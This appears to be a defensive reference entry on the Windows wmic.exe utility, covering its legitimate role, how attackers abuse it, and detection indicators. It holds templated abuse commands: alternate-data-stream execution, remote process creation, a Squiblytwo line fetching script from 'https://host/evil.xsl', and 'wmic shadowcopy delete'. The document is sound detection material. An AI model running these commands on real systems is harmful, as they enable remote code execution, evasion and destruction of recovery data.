Process
wmic.exe
wmic.exe is the WMI command-line utility, a tool for querying and controlling Windows through Windows Management Instrumentation (WMI). Administrators use it to read system information, manage processes and services, and run commands on remote machines. Microsoft has deprecated it, but it remains a powerful and heavily abused tool wherever it is still present.
File identity
Not observed.
Not observed.
Not observed.
Not observed.
Execution context
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Ancestry
Not observed.
Not observed.
Not observed.
Not observed.
Behavior
Not observed.
Not observed.
Not observed.
Not observed.
wmic.exe process call create "{PATH_ABSOLUTE}:program.exe"ADS · Execute binary file hidden in Alternate data streams to evade defensive counter measureswmic.exe process call create "{CMD}"Execute · Execute binary from wmic to evade defensive counter measureswmic.exe /node:"192.168.0.1" process call create "{CMD}"Execute · Execute binary on a remote systemwmic.exe process get brief /format:"{REMOTEURL:.xsl}"Execute · Execute binary on remote systemwmic.exe process get brief /format:"{PATH_SMB:.xsl}"Execute · Execute script from remote systemwmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"Copy · Copy file.
Indicators
Not observed.
Analysis
wmic.exe is a command-line front-end to WMI, the management layer that exposes almost everything about a Windows system, hardware, the operating system, processes, services, and installed software, as queryable objects. The genuine binary lives at C:\Windows\System32\wbem\wmic.exe (note the wbem subfolder), with a 32-bit copy under SysWOW64\wbem. Microsoft deprecated wmic in Windows 10 version 21H1 in favour of PowerShell's CIM cmdlets, so on the newest builds it may be absent. WMI itself is not going away, only this command-line front-end.
It can read (wmic process list, wmic os get), act locally (process call create starts a program), and reach other hosts with the /node: switch for remote management. The /format: switch applies an XSL stylesheet to the output, and that stylesheet can be a local file or a URL. Anything WMI can do, wmic can drive from a single command line.
Legitimately, wmic is run by administrators, inventory and management scripts, and software installers. Its parent and command line define each instance, and on current Windows it appears less and less as PowerShell takes over the role.
wmic.exe is a long-standing execution and lateral-movement tool (T1047). wmic process call create launches a program locally, and with /node: and credentials it launches one on a remote machine, a classic way to move across a network under a trusted, signed binary.
It is also a proxy-execution path through XSL, the technique known as Squiblytwo (T1220). A command line like wmic process get brief /format:"https://host/evil.xsl" makes wmic fetch a remote stylesheet and run the JScript or VBScript embedded in it, with nothing written to disk. A /format: pointing at a URL is the signature.
Ransomware leans on it too: wmic shadowcopy delete wipes Volume Shadow Copies so a victim cannot roll back before encryption (T1490). The same tool is a favorite for enumerating installed antivirus. In each case the binary is the genuine signed wmic, so path and signature checks pass and the command-line verb and parent are what reveal the intent.
- Image path other than
C:\Windows\System32\wbem\wmic.exeor itsSysWOW64\wbemcopyhigh process call create(local or remote program execution)high/node:targeting a remote hosthigh/format:referencing a URL or a remote XSL stylesheethighshadowcopy delete(destroying recovery points)high- Parent is an Office application,
cmd.exe,powershell.exe,wscript.exe,cscript.exe, ormshta.exehigh - Queries against
root\securitycenter2orantivirusproduct(security-product enumeration)med
Telemetry
Not observed.
Not observed.